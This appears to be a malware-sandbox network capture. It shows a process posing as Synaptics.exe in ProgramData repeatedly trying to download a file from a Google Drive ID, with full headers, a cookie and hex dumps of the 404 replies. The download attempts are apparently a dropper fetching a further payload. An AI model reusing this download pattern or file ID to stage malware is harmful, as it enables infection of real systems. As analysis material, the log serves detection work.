                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YxJmAg036C6iw7HNXJ-t6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    108192.168.2.949889142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:58 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:59 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-eVSJ9P-g24HWth88ZmH3hQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    109192.168.2.949891142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:59 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:59 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC585exS7V1Z7JWd0tPOyjazb13Q59T52u4H4N39Nt8xgxigS2_cWQacv5BQ8FP8d2E0
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:59 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wtnUeU-rC78gT31l6dENfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:59 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:59 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 4f 77 4e 67 77 52 63 48 35 33 72 73 41 41 67 32 4b 63 69 32 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="BOwNgwRcH53rsAAg2Kci2w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:59 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    110192.168.2.949892142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:59 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:59 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6hjBmZTql2QpgMf36Z3m_jYTUCj-P6RTCIY_t8n8ZRm8Thm3VIi-SA-S6EEokzVAUHufF0yIc
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:59 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-69ejyhKWHaU-IZFje0txeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:59 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:59 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 6e 2d 35 72 5a 32 30 6e 62 64 77 76 31 4b 68 42 36 4d 69 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="zn-5rZ20nbdwv1KhB6Mixw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:59 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    111192.168.2.949894142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:59 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:00 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-8FXmXrLafec2uBBIl1CNeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    112192.168.2.949893142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:59 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:00 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-20Ps8rXYBV0JyvYzrJshSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    113192.168.2.949895142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:00 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:00 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC43wxTFGryaZ44jby1-dov6rtF4nw6NYS6O-AiUe-a2QUqaoZnI4E10zci_AhnpHoMn
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:00 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Sptt28XtNp1l3jR_vTbVHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:00 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:00 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 77 62 6e 33 50 30 59 51 36 46 74 51 51 4f 35 62 62 70 5a 53 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="hwbn3P0YQ6FtQQO5bbpZSQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:00 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    114192.168.2.949896142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:00 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:00 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7QXvsmAJN7IHVDbK0q8d866LU_NSSUkIZU7HZYG8bX2qI0DBTMGDvms3zRPOYTeF92-1ZS54Q
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:00 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0Mv845j50wSf1CKQUkxzlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
